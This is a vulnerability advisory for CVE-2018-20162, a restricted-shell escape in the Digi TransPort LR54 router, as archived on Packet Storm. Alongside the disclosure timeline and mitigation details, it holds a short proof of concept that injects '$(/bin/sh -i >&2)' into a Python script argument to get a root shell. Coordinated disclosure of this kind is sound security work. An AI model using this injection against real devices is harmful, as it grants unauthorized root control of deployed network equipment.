exploit the possibilities

Digi TransPort LR54 Restricted Shell Escape

Digi TransPort LR54 Restricted Shell Escape
Posted Feb 18, 2019
Authored by Stig Palmquist

Digi TransPort LR54 suffers from a restricted shell bypass vulnerability that gets a root shell.

tags | exploit, shell, root, bypass
advisories | CVE-2018-20162
MD5 | 896322aa0ccd273bc0ef57111661649e

Digi TransPort LR54 Restricted Shell Escape

Change Mirror Download
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

CVE-2018-20162: Digi TransPort LR54 Restricted Shell Escape
===========================================================

The Digi TransPort LR54 is a high speed LTE router commonly used by industry,
infrastructure, retail and public transportation.

It supports running python scripts in a restricted sandbox, and has a custom
shell accessible over SSH which is subjected to the same restrictions. The
underlying OS is inaccessible to the administrator.

Iave found a way to break out of the sandbox and obtaining a root shell by
exploiting the way the cli handles command line arguments when executing python
scripts:

When an interactive python process receives a SIGINT (trough CTRL-C), arguments
to the script are not properly escaped when passed to the interactive CLIas
error logging handler. This allows an attacker to execute arbitrary commands as
root.

To exploit this vulnerability, an attacker needs to have interactive CLI access
with asupera privileges. A user with this access level is enabled by default on
the device.

Vulnerable
- ----------
Digi Transport LR54 (and maybe related products like WR64 and WR54)

Firmware Version : 4.4.0.26 10/29/2018 21:14:06
Firmware Version : 4.3.2.24 09/06/2018 00:58:34

And maybe earlier versions

Migitation
- ----------
Users should upgrade to firmware version 4.5.1.4 or newer.

Proof of Concept
- ----------------
1. Upload sleep.py to the LR54 using scp or sftp, containing:

import time;time.sleep(10)

2. Execute the following command in the LR54 cli:

python sleep.py --XXX $(/bin/sh -i >&2)

3. Immediately press CTRL-C after the program starts

4. You are then dropped to an interactive root shel
l
/home/digi/user # uname -a
Linux (none) 3.10.14 #1 SMP Mon Oct 29 16:18:10 CDT 2018 mips GNU/Linux
/home/digi/user # id
uid=0(root) gid=2000(users_rw) groups=2000(users_rw),2002(users_super)

Timeline
- --------
2018-12-13: Vulnerability discovered
2018-12-14: PoC created, Vendor notified
2018-12-14: Vendor confirmed, 60 day embargo. Applied for CVE.
2018-12-15: CVE-2018-20162 assigned
2018-12-31: Received pre-release firmware. Confirmed not vulnerable.
2019-01-02: Vendor releases fixed firmware 4.5.1.4
2019-01-25: Vendor updated release notes to reference CVE-2018-20162
2019-02-13: Vendor okaed disclosure, Embargo lifted

References
- ----------
https://www.digi.com/products/networking/cellular-routers/digi-transport-lr54
http://ftp1.digi.com/support/firmware/transport/LR54/v4.5.1.4/93001306_L.pdf
https://www.digi.com/resources/security
https://blog.hackeriet.no/cve-2018-20162-digi-lr54-restricted-shell-escape
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20162

Credits
- -------
Vulnerability discovered by Stig Palmquist.

Thanks to @duniel_pls and @alexanderkjall for reviewing this report.

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEj7OMIAQn+GdSU5z5EMg4owYJR3UFAlxpeAsACgkQEMg4owYJ
R3XfMg//UDSALVhqqLc2Y7Yn8DxVOnSiFuobwPlseSKw0MigNbDbyBH6q8S9ozbe
n1razr2tpPQPx24MGqniGxsKGDi+b0S1zayQxy2TePUA5B5axOuiZZt9qWIKeWHA
HnAgjXN3x7Zv1yavJ/GxxlHJXOUCbOpMTeF32E26J4MssTJyEF1Q3p5YiF+/V2/b
ne5x4hKsMbKpMmHSdCEb3CawqSZOl7/Wh8j/N5WayLTei7WBp8q9xVxBUBhpK1JR
xUAClpsaiIKSSga1Q/QfXG9sTr/8/Kz6Mc3TD2YhZkEsujNP77N4ZwqByYB3wSMI
B8MCrprIJUgGoiYlfg3yehXnj+SEkMgDXExPcy4B69sutCrXmfqfwh7EzynHgFDe
mOPvpuYdHsxsWekoU8HN+Oux1iuJek0S5XL+5Lo/P+Tp1JXQ9dQU3wRN3ZfpjKqQ
rP9jJDJVwE2rZHGsYyvMYvHZG0iPPLlq9T855z/13aZ7YDkRx5tvVb4m7ZVNLuxz
6Z+J3CGktlPrilID6YBwrC+FotoAvJGrvWaYHXNEl7sQc5SJbazdZrQHBRF/i3zN
1sntgI2AYyH7kx+hEwFkoaDaCM+Xsfm5sBJ9QC8OKZ315RYWvJAS0HXG1lmyXFYo
u15TlfvsA9PcnAeHT4c/jLf24C8YyaFQ3YiZMmfnw12uiH+eOKE=
=zEym
-----END PGP SIGNATURE-----

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

March 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    2 Files
  • 2
    Mar 2nd
    18 Files
  • 3
    Mar 3rd
    15 Files
  • 4
    Mar 4th
    12 Files
  • 5
    Mar 5th
    19 Files
  • 6
    Mar 6th
    8 Files
  • 7
    Mar 7th
    1 Files
  • 8
    Mar 8th
    1 Files
  • 9
    Mar 9th
    11 Files
  • 10
    Mar 10th
    15 Files
  • 11
    Mar 11th
    9 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    13 Files
  • 14
    Mar 14th
    10 Files
  • 15
    Mar 15th
    13 Files
  • 16
    Mar 16th
    27 Files
  • 17
    Mar 17th
    15 Files
  • 18
    Mar 18th
    23 Files
  • 19
    Mar 19th
    25 Files
  • 20
    Mar 20th
    10 Files
  • 21
    Mar 21st
    6 Files
  • 22
    Mar 22nd
    1 Files
  • 23
    Mar 23rd
    22 Files
  • 24
    Mar 24th
    15 Files
  • 25
    Mar 25th
    22 Files
  • 26
    Mar 26th
    20 Files
  • 27
    Mar 27th
    15 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close